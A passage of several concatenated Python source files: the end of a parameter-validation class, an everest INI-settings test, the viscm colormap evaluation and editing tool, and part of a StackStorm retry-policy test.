ast.literal_eval(v)) return self def to_params(self): """ Convert the instance dictionary into a sorted list of pairs (name, valrepr) where valrepr is the string representation of the underlying value. """ dic = self.__dict__ return [(k, repr(dic[k])) for k in sorted(dic)] def __init__(self, **names_vals): for name, val in names_vals.items(): if name.startswith(('_', 'is_valid_')): raise NameError('The parameter name %s is not acceptable' % name) try: convert = getattr(self.__class__, name).validator except AttributeError: logging.warn('The parameter %r is unknown, ignoring' % name) continue try: value = convert(val) except Exception as exc: raise ValueError('%s: could not convert to %s: %s=%s' % (exc, convert.__name__, name, val)) setattr(self, name, value) def validate(self): """ Apply the `is_valid` methods to self and possibly raise a ValueError. """ # it is important to have the validator applied in a fixed order valids = [getattr(self, valid) for valid in sorted(dir(self.__class__)) if valid.startswith('is_valid_')] for is_valid in valids: if not is_valid(): dump = '\n'.join('%s=%s' % (n, v) for n, v in sorted(self.__dict__.items())) docstring = is_valid.__doc__.strip() doc = textwrap.fill(docstring.format(**vars(self))) raise ValueError(doc + '\nGot:\n' + dump) def __iter__(self): for item in sorted(vars(self).items()): yield item def __repr__(self): names = sorted(n for n in vars(self) if not n.startswith('_')) nameval = ', '.join('%s=%r' % (n, getattr(self, n)) for n in names) return '<%s %s>' % (self.__class__.__name__, nameval)
""" This file is part of the everest project. See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information. Created on Nov 21, 2011. """ from everest.testing import EverestIni from everest.testing import Pep8CompliantTestCase from shutil import rmtree from tempfile import mkdtemp from tempfile import mktemp from everest.compat import open_text __docformat__ = 'reStructuredText en' __all__ = [] INI = """\ [DEFAULT] db_server = my_db_server db_port = 5432 db_user = my_db_user db_password = pwd123 db_name = my_db_name [app:mysimple_app] db_string = postgresql://%(db_user)s:%(db_password)s@%(db_server)s:%(db_port)s/%(db_name)s db_echo = false """ class TestingTestCase(Pep8CompliantTestCase): ini_section_name = 'app:mysimple_app' def set_up(self): self.__testdir = mkdtemp() fn = mktemp(suffix="ini", dir=self.__testdir) ini_file = open_text(fn) ini_file.write(INI) ini_file.close() self.ini_file_path = fn def tear_down(self): rmtree(self.__testdir) def test_ini_file_read(self): ini = EverestIni(self.ini_file_path) ini_marker = self.ini_section_name db_string = ini.get_setting(ini_marker, 'db_string') self.assert_equal( db_string, 'postgresql://my_db_user:pwd123@my_db_server:5432/my_db_name')
# This file is part of viscm # Copyright (C) 2015 Nathaniel Smith <[email protected]> # Copyright (C) 2015 Stefan van der Walt <[email protected]> # See file LICENSE.txt for license information. # Simple script using CIECAM02 and CAM02-UCS to visualize properties of a # matplotlib colormap import sys import os.path import numpy as np import matplotlib.pyplot as plt import mpl_toolkits.mplot3d from matplotlib.gridspec import GridSpec from matplotlib.widgets import Button, Slider import matplotlib.colors from matplotlib.colors import LinearSegmentedColormap from colorspacious import cspace_converter from .minimvc import Trigger # Our preferred space (mostly here so we can easily tweak it when curious) UNIFORM_SPACE = "CAM02-UCS" GREYSCALE_CONVERSION_SPACE = "JCh" _sRGB1_to_JCh = cspace_converter("sRGB1", GREYSCALE_CONVERSION_SPACE) _JCh_to_sRGB1 = cspace_converter(GREYSCALE_CONVERSION_SPACE, "sRGB1") def to_greyscale(sRGB1): JCh = _sRGB1_to_JCh(sRGB1) JCh[..., 1] = 0 return _JCh_to_sRGB1(JCh) _sRGB1_to_uniform = cspace_converter("sRGB1", UNIFORM_SPACE) _uniform_to_sRGB1 = cspace_converter(UNIFORM_SPACE, "sRGB1") _deuter50_space = {"name": "sRGB1+CVD", "cvd_type": "deuteranomaly", "severity": 50} _deuter50_to_sRGB1 = cspace_converter(_deuter50_space, "sRGB1") _deuter100_space = {"name": "sRGB1+CVD", "cvd_type": "deuteranomaly", "severity": 100} _deuter100_to_sRGB1 = cspace_converter(_deuter100_space, "sRGB1") _prot50_space = {"name": "sRGB1+CVD", "cvd_type": "protanomaly", "severity": 50} _prot50_to_sRGB1 = cspace_converter(_prot50_space, "sRGB1") _prot100_space = {"name": "sRGB1+CVD", "cvd_type": "protanomaly", "severity": 100} _prot100_to_sRGB1 = cspace_converter(_prot100_space, "sRGB1") def _show_cmap(ax, rgb): ax.imshow(rgb[np.newaxis, ...], aspect="auto") def _apply_rgb_mat(mat, rgb): return np.clip(np.einsum("...ij,...j->...i", mat, rgb), 0, 1) # sRGB corners: a' goes from -37.4 to 45 AP_LIM = (-38, 46) # b' goes from -46.5 to 42 BP_LIM = (-47, 43) # J'/K goes from 0 to 100 JP_LIM = (-1, 101) def _setup_Jpapbp_axis(ax): ax.set_xlabel("a' (green -> red)") ax.set_ylabel("b' (blue -> yellow)") ax.set_zlabel("J'/K (white -> black)") ax.set_xlim(*AP_LIM) ax.set_ylim(*BP_LIM) ax.set_zlim(*JP_LIM) # Adapt a matplotlib colormap to a linearly transformed version -- useful for # visualizing how colormaps look given color deficiency. # Kinda a hack, b/c we inherit from Colormap (this is required), but then # ignore its implementation entirely. class TransformedCMap(matplotlib.colors.Colormap): def __init__(self, transform, base_cmap): self.transform = transform self.base_cmap = base_cmap def __call__(self, *args, **kwargs): fx = self.base_cmap(*args, **kwargs) tfx = self.transform(fx) return tfx def set_bad(self, *args, **kwargs): self.base_cmap.set_bad(*args, **kwargs) def set_under(self, *args, **kwargs): self.base_cmap.set_under(*args, **kwargs) def set_over(self, *args, **kwargs): self.base_cmap.set_over(*args, **kwargs) def is_gray(self): return False def _vis_axes(): grid = GridSpec(10, 4, left=0.02, right=0.98, bottom=0.02, width_ratios=[1] * 4, height_ratios=[1] * 10) axes = {'cmap': grid[0, 0], 'deltas': grid[1:4, 0], 'cmap-greyscale': grid[0, 1], 'lightness-deltas': grid[1:4, 1], 'deuteranomaly': grid[4, 0], 'deuteranopia': grid[5, 0], 'protanomaly': grid[4, 1], 'protanopia': grid[5, 1], # 'lightness': grid[4:6, 1], # 'colourfulness': grid[4:6, 2], # 'hue': grid[4:6, 3], 'image0': grid[0:3, 2], 'image0-cb': grid[0:3, 3], 'image1': grid[3:7, 2], 'image1-cb': grid[3:7, 3], 'image2': grid[7:, 2], 'image2-cb': grid[7:, 3], } axes = dict([(key, plt.subplot(value)) for (key, value) in axes.items()]) axes['gamut'] = plt.subplot(grid[6:, :2], projection='3d') axes['gamut-toggle'] = plt.axes([0.01, 0.01, 0.08, 0.025]) return axes # N=256 matches the default quantization for LinearSegmentedColormap, which # reduces quantization/aliasing artifacts (esp. in the perceptual deltas # plot). class viscm(object): def __init__(self, cm, name=None, N=256, N_dots=50, show_gamut=False): if isinstance(cm, str): cm = plt.get_cmap(cm) if name is None: name = cm.name self.fig = plt.figure() self.fig.suptitle("Colormap evaluation: %s" % (name,), fontsize=24) axes = _vis_axes() x = np.linspace(0, 1, N) x_dots = np.linspace(0, 1, N_dots) RGB = cm(x)[:, :3] RGB_dots = cm(x_dots)[:, :3] ax = axes['cmap'] _show_cmap(ax, RGB) ax.set_title("The colormap in its glory") ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) def label(ax, s): ax.text(0.95, 0.05, s, horizontalalignment="right", verticalalignment="bottom", transform=ax.transAxes) Jpapbp = _sRGB1_to_uniform(RGB) ax = axes['deltas'] local_deltas = N * np.sqrt(np.sum((Jpapbp[:-1, :] - Jpapbp[1:, :]) ** 2, axis=-1)) ax.plot(x[1:], local_deltas) arclength = np.sum(local_deltas) / N label(ax, "Perceptual deltas (total: %0.2f)" % (arclength,)) ax.set_ylim(0, ax.get_ylim()[1]) ax.get_xaxis().set_visible(False) ax = axes['cmap-greyscale'] _show_cmap(ax, to_greyscale(RGB)) ax.set_title("Black-and-white printed") ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) ax = axes['lightness-deltas'] ax.axhline(0, linestyle="--", color="grey") lightness_deltas = N * np.diff(Jpapbp[:, 0]) ax.plot(x[1:], lightness_deltas) label(ax, "Perceptual lightness deltas (total: %0.2f)" % (np.sum(np.abs(lightness_deltas)) / N,)) #ax.set_ylim(0, ax.get_ylim()[1]) ax.get_xaxis().set_visible(False) # ax = axes['lightness'] # ax.plot(x, ciecam02.J) # label(ax, "Lightness (J)") # ax.set_ylim(0, 105) # ax = axes['colourfulness'] # ax.plot(x, ciecam02.M) # label(ax, "Colourfulness (M)") # ax = axes['hue'] # ax.plot(x, ciecam02.h) # label(ax, "Hue angle (h)") # ax.set_ylim(0, 360) def anom(ax, converter, name): _show_cmap(ax, np.clip(converter(RGB), 0, 1)) label(ax, name) ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) anom(axes['deuteranomaly'], _deuter50_to_sRGB1, "Moderate deuteranomaly") anom(axes['deuteranopia'], _deuter100_to_sRGB1, "Complete deuteranopia") anom(axes['protanomaly'], _prot50_to_sRGB1, "Moderate protanomaly") anom(axes['protanopia'], _prot100_to_sRGB1, "Complete protanopia") ax = axes['gamut'] ax.plot(Jpapbp[:, 1], Jpapbp[:, 2], Jpapbp[:, 0]) Jpapbp_dots = _sRGB1_to_uniform(RGB_dots) ax.scatter(Jpapbp_dots[:, 1], Jpapbp_dots[:, 2], Jpapbp_dots[:, 0], c=RGB_dots[:, :], s=80) # Draw a wireframe indicating the sRGB gamut self.gamut_patch = sRGB_gamut_patch() # That function returns a patch where each face is colored to match # the represented colors. For present purposes we want something # less... colorful. self.gamut_patch.set_facecolor([0.5, 0.5, 0.5, 0.1]) self.gamut_patch.set_edgecolor([0.2, 0.2, 0.2, 0.1]) ax.add_collection3d(self.gamut_patch) self.gamut_patch.set_visible(show_gamut) ax.view_init(elev=75, azim=-75) self.gamut_patch_toggle = Button(axes['gamut-toggle'], "Toggle gamut") def toggle(*args): self.gamut_patch.set_visible(not self.gamut_patch.get_visible()) plt.draw() self.gamut_patch_toggle.on_clicked(toggle) _setup_Jpapbp_axis(ax) images = [] image_args = [] example_dir = os.path.join(os.path.dirname(__file__), "examples") images.append(np.loadtxt(os.path.join(example_dir, "hist2d.txt"))) image_args.append({"aspect": "equal", "origin": "lower", "interpolation": "nearest", "vmin": 0}) images.append(np.loadtxt(os.path.join(example_dir, "st-helens_before-modified.txt.gz")).T) image_args.append({}) # Adapted from http://matplotlib.org/mpl_examples/images_contours_and_fields/pcolormesh_levels.py dx = dy = 0.05 y, x = np.mgrid[-5 : 5 + dy : dy, -5 : 10 + dx : dx] z = np.sin(x) ** 10 + np.cos(10 + y * x) + np.cos(x) + 0.2 * y + 0.1 * x images.append(z) image_args.append({}) def _deuter_transform(RGBA): # clipping, alpha handling RGB = RGBA[..., :3] RGB = np.clip(_deuter50_to_sRGB1(RGB), 0, 1) return np.concatenate((RGB, RGBA[..., 3:]), axis=-1) deuter_cm = TransformedCMap(_deuter_transform, cm) for i, (image, args) in enumerate(zip(images, image_args)): ax = axes['image%i' % (i,)] ax.imshow(image, cmap=cm, **args) ax.get_xaxis().set_visible(False) ax.get_yaxis().set_visible(False) ax_cb = axes['image%i-cb' % (i,)] ax_cb.imshow(image, cmap=deuter_cm, **args) ax_cb.get_xaxis().set_visible(False) ax_cb.get_yaxis().set_visible(False) axes['image0'].set_title("Sample images") axes['image0-cb'].set_title("Moderate deuter.") def sRGB_gamut_patch(resolution=20): step = 1.0 / resolution sRGB_quads = [] sRGB_values = [] # each entry in 'quads' is a 4x3 array where each row contains the # coordinates of a corner point for fixed in 0, 1: for i in range(resolution): for j in range(resolution): # R quad sRGB_quads.append([[fixed, i * step, j * step], [fixed, (i+1) * step, j * step], [fixed, (i+1) * step, (j+1) * step], [fixed, i * step, (j+1) * step]]) sRGB_values.append((fixed, (i + 0.5) * step, (j + 0.5) * step, 1)) # G quad sRGB_quads.append([[i * step, fixed, j * step], [(i+1) * step, fixed, j * step], [(i+1) * step, fixed, (j+1) * step], [i * step, fixed, (j+1) * step]]) sRGB_values.append(((i + 0.5) * step, fixed, (j + 0.5) * step, 1)) # B quad sRGB_quads.append([[i * step, j * step, fixed], [(i+1) * step, j * step, fixed], [(i+1) * step, (j+1) * step, fixed], [i * step, (j+1) * step, fixed]]) sRGB_values.append(((i + 0.5) * step, (j + 0.5) * step, fixed, 1)) sRGB_quads = np.asarray(sRGB_quads) # work around colorspace transform bugginess in handling high-dim # arrays sRGB_quads_2d = sRGB_quads.reshape((-1, 3)) Jpapbp_quads_2d = _sRGB1_to_uniform(sRGB_quads_2d) Jpapbp_quads = Jpapbp_quads_2d.reshape((-1, 4, 3)) gamut_patch = mpl_toolkits.mplot3d.art3d.Poly3DCollection( Jpapbp_quads[:, :, [1, 2, 0]]) gamut_patch.set_facecolor(sRGB_values) gamut_patch.set_edgecolor(sRGB_values) return gamut_patch def sRGB_gamut_Jp_slice(Jp, ap_lim=(-50, 50), bp_lim=(-50, 50), resolution=200): bp_grid, ap_grid = np.mgrid[bp_lim[0] : bp_lim[1] : resolution * 1j, ap_lim[0] : ap_lim[1] : resolution * 1j] Jp_grid = Jp * np.ones((resolution, resolution)) Jpapbp = np.concatenate((Jp_grid[:, :, np.newaxis], ap_grid[:, :, np.newaxis], bp_grid[:, :, np.newaxis]), axis=2) sRGB = _uniform_to_sRGB1(Jpapbp) sRGBA = np.concatenate((sRGB, np.ones(sRGB.shape[:2] + (1,))), axis=2) sRGBA[np.any((sRGB < 0) | (sRGB > 1), axis=-1)] = [0, 0, 0, 0] return sRGBA def draw_pure_hue_angles(ax): # Pure hue angles from CIECAM-02 for color, angle in [("r", 20.14), ("y", 90.00), ("g", 164.25), ("b", 237.53)]: x = np.cos(np.deg2rad(angle)) y = np.sin(np.deg2rad(angle)) ax.plot([0, x * 1000], [0, y * 1000], color + "--") def draw_sRGB_gamut_Jp_slice(ax, Jp, ap_lim=(-50, 50), bp_lim=(-50, 50), **kwargs): sRGB = sRGB_gamut_Jp_slice(Jp, ap_lim=ap_lim, bp_lim=bp_lim, **kwargs) im = ax.imshow(sRGB, aspect="equal", extent=ap_lim + bp_lim, origin="lower") draw_pure_hue_angles(ax) ax.set_xlim(ap_lim) ax.set_ylim(bp_lim) return im # def sRGB_gamut_J_slice(J, # ap_lim=(-50, 50), bp_lim=(-50, 50), resolution=200): # a_grid, b_grid = np.mgrid[ap_lim[0] : ap_lim[1] : resolution * 1j, # bp_lim[0] : bp_lim[1] : resolution * 1j] # J_grid = J * np.ones((resolution, resolution)) # h = np.rad2deg(np.arctan2(b_grid, a_grid)) # M = np.hypot(a_grid, b_grid) # XYZ = ViewingConditions.sRGB.CIECAM02_to_XYZ(J=J_grid, M=M, h=h) # sRGB = XYZ_to_sRGB(XYZ) # sRGB[np.any((sRGB < 0) | (sRGB > 1), axis=-1)] = np.nan # return sRGB def _viscm_editor_axes(): grid = GridSpec(1, 2, width_ratios=[5, 1], height_ratios=[6, 1]) axes = {'bezier': grid[0, 0], 'cm': grid[0, 1]} axes = dict([(key, plt.subplot(value)) for (key, value) in axes.items()]) return axes class viscm_editor(object): def __init__(self, min_Jp=15, max_Jp=95, xp=None, yp=None): from .bezierbuilder import BezierModel, BezierBuilder axes = _viscm_editor_axes() ax_btn_wireframe = plt.axes([0.7, 0.15, 0.1, 0.025]) self.btn_wireframe = Button(ax_btn_wireframe, 'Show 3D gamut') self.btn_wireframe.on_clicked(self.plot_3d_gamut) ax_btn_wireframe = plt.axes([0.81, 0.15, 0.1, 0.025]) self.btn_save = Button(ax_btn_wireframe, 'Save colormap') self.btn_save.on_clicked(self.save_colormap) ax_btn_props = plt.axes([0.81, 0.1, 0.1, 0.025]) self.btn_props = Button(ax_btn_props, 'Properties') self.btn_props.on_clicked(self.show_viscm) self.prop_windows = [] axcolor = 'None' ax_jp_min = plt.axes([0.1, 0.1, 0.5, 0.03], axisbg=axcolor) ax_jp_min.imshow(np.linspace(0, 100, 101).reshape(1, -1), cmap='gray') ax_jp_min.set_xlim(0, 100) ax_jp_max = plt.axes([0.1, 0.15, 0.5, 0.03], axisbg=axcolor) ax_jp_max.imshow(np.linspace(0, 100, 101).reshape(1, -1), cmap='gray') self.jp_min_slider = Slider(ax_jp_min, r"$J'_\mathrm{min}$", 0, 100, valinit=min_Jp) self.jp_max_slider = Slider(ax_jp_max, r"$J'_\mathrm{max}$", 0, 100, valinit=max_Jp) self.jp_min_slider.on_changed(self._jp_update) self.jp_max_slider.on_changed(self._jp_update) # This is my favorite set of control points so far (just from playing # around with things): # min_Jp = 15 # max_Jp = 95 # xp = # [-4, 27.041103603603631, 84.311067635550557, 12.567076579094476, -9.6] # yp = # [-34, -41.447876447876524, 36.28563443264386, 25.357741755170423, 41] # -- njs, 2015-04-05 if xp is None: xp = [-4, 38.289146128951984, 52.1923711457504, 39.050944362271053, 18.60872492130315, -9.6] if yp is None: yp = [-34, -34.34528254916614, -21.594701710471412, 31.701084689194829, 29.510846891948262, 41] self.bezier_model = BezierModel(xp, yp) self.cmap_model = BezierCMapModel(self.bezier_model, self.jp_min_slider.val, self.jp_max_slider.val) self.highlight_point_model = HighlightPointModel(self.cmap_model, 0.5) self.bezier_builder = BezierBuilder(axes['bezier'], self.bezier_model) self.bezier_gamut_viewer = GamutViewer2D(axes['bezier'], self.highlight_point_model) tmp = HighlightPoint2DView(axes['bezier'], self.highlight_point_model) self.bezier_highlight_point_view = tmp #draw_pure_hue_angles(axes['bezier']) axes['bezier'].set_xlim(-100, 100) axes['bezier'].set_ylim(-100, 100) self.cmap_view = CMapView(axes['cm'], self.cmap_model) self.cmap_highlighter = HighlightPointBuilder( axes['cm'], self.highlight_point_model) print("Click sliders at bottom to change min/max lightness") print("Click on colorbar to adjust gamut view") print("Click-drag to move control points, ") print(" shift-click to add, control-click to delete") def plot_3d_gamut(self, event): fig, ax = plt.subplots(subplot_kw=dict(projection='3d')) self.wireframe_view = WireframeView(ax, self.cmap_model, self.highlight_point_model) plt.show() def save_colormap(self, event): import textwrap template = textwrap.dedent(''' from matplotlib.colors import LinearSegmentedColormap from numpy import nan, inf # Used to reconstruct the colormap in pycam02ucs.cm.viscm parameters = {{'xp': {xp}, 'yp': {yp}, 'min_Jp': {min_Jp}, 'max_Jp': {max_Jp}}} cm_data = {array_list} test_cm = LinearSegmentedColormap.from_list(__file__, cm_data) if __name__ == "__main__": import matplotlib.pyplot as plt import numpy as np try: from pycam02ucs.cm.viscm import viscm viscm(test_cm) except ImportError: print("pycam02ucs not found, falling back on simple display") plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=test_cm) plt.show() ''') rgb, _ = self.cmap_model.get_sRGB(num=256) with open('/tmp/new_cm.py', 'w') as f: array_list = np.array_repr(rgb, max_line_width=78) array_list = array_list.replace('array(', '')[:-1] xp, yp = self.cmap_model.bezier_model.get_control_points() data = dict(array_list=array_list, xp=xp, yp=yp, min_Jp=self.cmap_model.min_Jp, max_Jp=self.cmap_model.max_Jp) f.write(template.format(**data)) print("*" * 50) print("Saved colormap to /tmp/new_cm.py") print("*" * 50) def show_viscm(self, event): cm = LinearSegmentedColormap.from_list( 'test_cm', self.cmap_model.get_sRGB(num=256)[0]) self.prop_windows.append(viscm(cm, name='test_cm')) plt.show() def _jp_update(self, val): jp_min = self.jp_min_slider.val jp_max = self.jp_max_slider.val smallest, largest = min(jp_min, jp_max), max(jp_min, jp_max) if (jp_min > smallest) or (jp_max < largest): self.jp_min_slider.set_val(smallest) self.jp_max_slider.set_val(largest) self.cmap_model.set_Jp_minmax(smallest, largest) class BezierCMapModel(object): def __init__(self, bezier_model, min_Jp, max_Jp): self.bezier_model = bezier_model self.min_Jp = min_Jp self.max_Jp = max_Jp self.trigger = Trigger() self.bezier_model.trigger.add_callback(self.trigger.fire) def set_Jp_minmax(self, min_Jp, max_Jp): self.min_Jp = min_Jp self.max_Jp = max_Jp self.trigger.fire() def get_Jpapbp_at(self, at): ap, bp = self.bezier_model.get_bezier_points_at(at) Jp = (self.max_Jp - self.min_Jp) * at + self.min_Jp return Jp, ap, bp def get_Jpapbp(self, num=200): return self.get_Jpapbp_at(np.linspace(0, 1, num)) def get_sRGB(self, num=200): # Return sRGB and out-of-gamut mask Jp, ap, bp = self.get_Jpapbp(num=num) sRGB = _uniform_to_sRGB1(np.column_stack((Jp, ap, bp))) oog = np.any((sRGB > 1) | (sRGB < 0), axis=-1) sRGB[oog, :] = np.nan return sRGB, oog class CMapView(object): def __init__(self, ax, cmap_model): self.ax = ax self.cmap_model = cmap_model rgb_display, oog_display = self._drawable_arrays() self.image = self.ax.imshow(rgb_display, extent=(0, 0.2, 0, 1), origin="lower") self.gamut_alert_image = self.ax.imshow(oog_display, extent=(0.05, 0.15, 0, 1), origin="lower") self.ax.set_xlim(0, 0.2) self.ax.set_ylim(0, 1) self.ax.get_xaxis().set_visible(False) self.cmap_model.trigger.add_callback(self._refresh) def _drawable_arrays(self): rgb, oog = self.cmap_model.get_sRGB() rgb_display = rgb[:, np.newaxis, :] oog_display = np.empty((rgb.shape[0], 1, 4)) oog_display[...] = [0, 0, 0, 0] oog_display[oog, :, :] = [0, 1, 1, 1] return rgb_display, oog_display def _refresh(self): rgb_display, oog_display = self._drawable_arrays() self.image.set_data(rgb_display) self.gamut_alert_image.set_data(oog_display) class HighlightPointModel(object): def __init__(self, cmap_model, point): self._cmap_model = cmap_model self._point = point self.trigger = Trigger() self._cmap_model.trigger.add_callback(self.trigger.fire) def get_point(self): return self._point def set_point(self, point): self._point = point self.trigger.fire() def get_Jpapbp(self): return self._cmap_model.get_Jpapbp_at(self._point) class HighlightPointBuilder(object): def __init__(self, ax, highlight_point_model): self.ax = ax self.highlight_point_model = highlight_point_model self.canvas = self.ax.figure.canvas self._in_drag = False self.canvas.mpl_connect("button_press_event", self._on_button_press) self.canvas.mpl_connect("motion_notify_event", self._on_motion) self.canvas.mpl_connect("button_release_event", self._on_button_release) self.marker_line = self.ax.axhline(highlight_point_model.get_point(), linewidth=3, color="r") self.highlight_point_model.trigger.add_callback(self._refresh) def _on_button_press(self, event): if event.inaxes != self.ax: return if event.button != 1: return self._in_drag = True self.highlight_point_model.set_point(event.ydata) def _on_motion(self, event): if self._in_drag and event.ydata is not None: self.highlight_point_model.set_point(event.ydata) def _on_button_release(self, event): if event.button != 1: return self._in_drag = False def _refresh(self): point = self.highlight_point_model.get_point() self.marker_line.set_data([0, 1], [point, point]) self.canvas.draw() class GamutViewer2D(object): def __init__(self, ax, highlight_point_model, ap_lim=(-50, 50), bp_lim=(-50, 50)): self.ax = ax self.highlight_point_model = highlight_point_model self.ap_lim = ap_lim self.bp_lim = bp_lim self.bgcolors = {"light": (0.9, 0.9, 0.9), "dark": (0.1, 0.1, 0.1)} # We want some hysteresis, so that there's no point where wiggling the # line back and forth causes background flickering. self.bgcolor_ranges = {"light": (0, 60), "dark": (40, 100)} self.bg_opposites = {"light": "dark", "dark": "light"} self.bg = "light" self.ax.set_axis_bgcolor(self.bgcolors[self.bg]) self.image = self.ax.imshow([[[0, 0, 0]]], aspect="equal", extent=ap_lim + bp_lim, origin="lower") self.highlight_point_model.trigger.add_callback(self._refresh) def _refresh(self): Jp, _, _ = self.highlight_point_model.get_Jpapbp() low, high = self.bgcolor_ranges[self.bg] if not (low <= Jp <= high): self.bg = self.bg_opposites[self.bg] self.ax.set_axis_bgcolor(self.bgcolors[self.bg]) sRGB = sRGB_gamut_Jp_slice(Jp, self.ap_lim, self.bp_lim) self.image.set_data(sRGB) class HighlightPoint2DView(object): def __init__(self, ax, highlight_point_model): self.ax = ax self.highlight_point_model = highlight_point_model _, ap, bp = self.highlight_point_model.get_Jpapbp() self.marker = self.ax.plot([ap], [bp], "y.", mew=3)[0] self.highlight_point_model.trigger.add_callback(self._refresh) def _refresh(self): _, ap, bp = self.highlight_point_model.get_Jpapbp() self.marker.set_data([ap], [bp]) self.ax.figure.canvas.draw() class WireframeView(object): def __init__(self, ax, cmap_model, highlight_point_model): self.ax = ax self.cmap_model = cmap_model self.highlight_point_model = highlight_point_model Jp, ap, bp = self.cmap_model.get_Jpapbp() self.line = self.ax.plot([0, 10], [0, 10])[0] #self.line = self.ax.plot(Jp, ap, bp)[0] Jp, ap, bp = self.highlight_point_model.get_Jpapbp() self.marker = self.ax.plot([Jp], [ap], [bp], "y.", mew=3)[0] gamut_patch = sRGB_gamut_patch() # That function returns a patch where each face is colored to match # the represented colors. For present purposes we want something # less... colorful. gamut_patch.set_facecolor([0.5, 0.5, 0.5, 0.1]) gamut_patch.set_edgecolor([0.2, 0.2, 0.2, 0.1]) self.ax.add_collection3d(gamut_patch) _setup_Jpapbp_axis(self.ax) #self.cmap_model.trigger.add_callback(self._refresh_line) #self.highlight_point_model.trigger.add_callback(self._refresh_point) self._refresh_line() self._refresh_point() def _refresh_line(self): Jp, ap, bp = self.cmap_model.get_Jpapbp() self.line.set_data(ap, bp) self.line.set_3d_properties(zs=Jp) self.ax.figure.canvas.draw() def _refresh_point(self): Jp, ap, bp = self.highlight_point_model.get_Jpapbp() self.marker.set_data([ap], [bp]) self.marker.set_3d_properties(zs=[Jp]) self.ax.figure.canvas.draw() def main(argv): import argparse # Usage: # python -m viscm # python -m viscm edit # python -m viscm edit <file.py> # (file.py must define some appropriate globals) # python -m viscm view <file.py> # (file.py must define a global named "test_cm") # python -m viscm view "matplotlib builtin colormap" # python -m viscm view --save=foo.png ... parser = argparse.ArgumentParser( prog="python -m viscm", description="A colormap tool.", ) parser.add_argument("action", metavar="ACTION", help="'edit' or 'view'", choices=["edit", "view", "show"], default="edit", nargs="?") parser.add_argument("colormap", metavar="COLORMAP", default=None, help="A .py file saved from the editor, or " "the name of a matplotlib builtin colormap", nargs="?") parser.add_argument("--save", metavar="FILE", default=None, help="Immediately save visualization to a file (view-mode only).") parser.add_argument("--quit", default=False, action="store_true", help="Quit immediately after starting (useful with --save).") args = parser.parse_args(argv) params = {} cmap = None if args.colormap: if os.path.isfile(args.colormap): ns = {'__name__': '', '__file__': os.path.basename(args.colormap), } with open(args.colormap) as f: code = compile(f.read(), os.path.basename(args.colormap), 'exec') exec(code, globals(), ns) params = ns.get('parameters', {}) if "min_JK" in params: params["min_Jp"] = params.pop("min_JK") params["max_Jp"] = params.pop("max_JK") cmap = ns.get("test_cm", None) else: cmap = plt.get_cmap(args.colormap) # Easter egg! I keep typing 'show' instead of 'view' so accept both if args.action in ("view", "show"): if cmap is None: sys.exit("Please specify a colormap") v = viscm(cmap) if args.save is not None: v.fig.set_size_inches(20, 12) v.fig.savefig(args.save) elif args.action == "edit": if params is None: sys.exit("Sorry, I don't know how to edit the specified colormap") # Hold a reference so it doesn't get GC'ed v = viscm_editor(**params) else: raise RuntimeError("can't happen") if args.quit: sys.exit() plt.show() if __name__ == "__main__": main(sys.argv[1:])
# Licensed to the StackStorm, Inc ('StackStorm') under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import st2actions from st2common.constants.action import LIVEACTION_STATUS_REQUESTED from st2common.constants.action import LIVEACTION_STATUS_SUCCEEDED from st2common.constants.action import LIVEACTION_STATUS_TIMED_OUT from st2common.bootstrap.policiesregistrar import register_policy_types from st2common.models.db.action import LiveActionDB from st2common.persistence.action import LiveAction, ActionExecution from st2common.services import action as action_service from st2actions.policies.retry import ExecutionRetryPolicyApplicator from st2tests.base import DbTestCase from st2tests.base import CleanDbTestCase from st2tests.fixturesloader import FixturesLoader PACK = 'generic' TEST_FIXTURES = { 'runners': [ 'testrunner1.yaml' ], 'actions': [ 'action1.yaml' ], 'policies': [ 'policy_4.yaml' ] } class RetryPolicyTestCase(CleanDbTestCase): @classmethod def setUpClass(cls): DbTestCase.setUpClass() super(RetryPolicyTestCase, cls).setUpClass() def setUp(self): super(RetryPolicyTestCase, self).setUp() # Register common policy types register_policy_types(st2actions) loader = FixturesLoader() models = loader.save_fixtures_to_db(fixtures_pack=PACK, fixtures_dict=TEST_FIXTURES) # Instantiate policy applicator we will use in the tests policy_db = models['policies']['policy_4.yaml'] retry_on = policy_db.parameters['retry_on'] max_retry_count = policy_db.parameters['max_retry_count'] self.policy = ExecutionRetryPolicyApplicator(policy_ref='test_policy', policy_type='action.retry', retry_on=retry_on, max_retry_count=max_retry_count, delay=0) def test_retry_on_timeout_no_retry_since_no_timeout_reached(self): # Verify initial state self.assertSequenceEqual(LiveAction.get_all(), []) self.assertSequenceEqual(ActionExecution.get_all(), []) # Start a mock action which succeeds liveaction = LiveActionDB(action='wolfpack.action-1', parameters={'actionstr': 'foo'}) live_action_db, execution_db = action_service.request(liveaction) live_action_db.status = LIVEACTION_STATUS_SUCCEEDED execution_db.status = LIVEACTION_STATUS_SUCCEEDED LiveAction.add_or_update(live_action_db) ActionExecution.add_or_update(execution_db) # Simulate policy "apply_after" run self.policy.apply_after(target=live_action_db) # There should only be 1 object since the action didn't timeout and therefore it wasn't # retried live_action_dbs = LiveAction.get_all() action_execution_dbs = ActionExecution.get_all() self.assertEqual(len(live_action_dbs), 1) self.assertEqual(len(action_execution_dbs), 1) self.assertEqual(action_execution_dbs[0].status, LIVEACTION_STATUS_SUCCEEDED) def test_retry_on_timeout_first_retry_is_successful(self): # Verify initial state self.assertSequenceEqual(LiveAction.get_all(), []) self.assertSequenceEqual(ActionExecution.get_all(), []) # Start a mock action which times out liveaction = LiveActionDB(action='wolfpack.action-1', parameters={'actionstr': 'foo'}) live_action_db, execution_db = action_service.request(liveaction) live_action_db.status = LIVEACTION_STATUS_TIMED_OUT execution_db.status = LIVEACTION_STATUS_TIMED_OUT LiveAction.add_or_update(live_action_db) ActionExecution.add_or_update(execution_db) # Simulate policy "apply_after" run 